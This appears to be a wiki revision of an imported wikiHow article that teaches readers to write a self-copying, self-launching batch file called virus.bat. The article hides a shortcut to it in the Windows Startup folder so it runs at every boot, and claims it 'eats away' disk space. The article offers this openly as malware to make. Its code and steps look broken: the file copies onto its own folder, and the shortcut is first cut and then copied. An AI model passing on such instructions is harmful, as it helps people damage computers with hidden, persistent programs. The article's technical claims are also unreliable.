Make an Easy Worm Virus With Two Lines of Code

Revision as of 07:15, 13 August 2016 by Kipkis (Kipkis | contribs) (importing article from wikihow)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

This will teach you how to create an easy virus with simple steps and two lines of code.

Steps

  1. Log on to your computer as an administrator.
  2. Go on C drive and create a folder, name it "Programs"
  3. Open up notepad and type in "@echo off"
  4. Then, write "Copy C:\Programs\virus.bat C:\Programs" on the second line. On the third line write "Start C:\Programs\virus.bat".
  5. Click "Save as" and save as virus.bat in the file (Programs) you just made.
  6. If you want the worm to start whenever the computer starts, right click on "virus.bat" and click create shortcut. A shortcut will be made on programs.
  7. Right click on the shortcut icon and click "cut".
  8. Right click on the shortcut and click "copy".
  9. Right click on your start menu and click "explore".
  10. Go to All Programs, then find the file named startup.
  11. Paste the shortcut onto the startup folder.
  12. Right click on the shortcut and go to properties, click on hidden, then press "Apply" or "OK".
  13. You have successfully made a working worm virus. To start it, restart your computer and the disk space on C drive will be eaten away.
  14. To get rid of the worm virus just simply delete the "programs" file.

Tips

  • If you want to hide the programs file, go to properties and click hidden.
  • In order to delete the batch file, click "show hidden files" on folder properties and delete the shortcuts. In startup menu, they will be automatically started on system boot.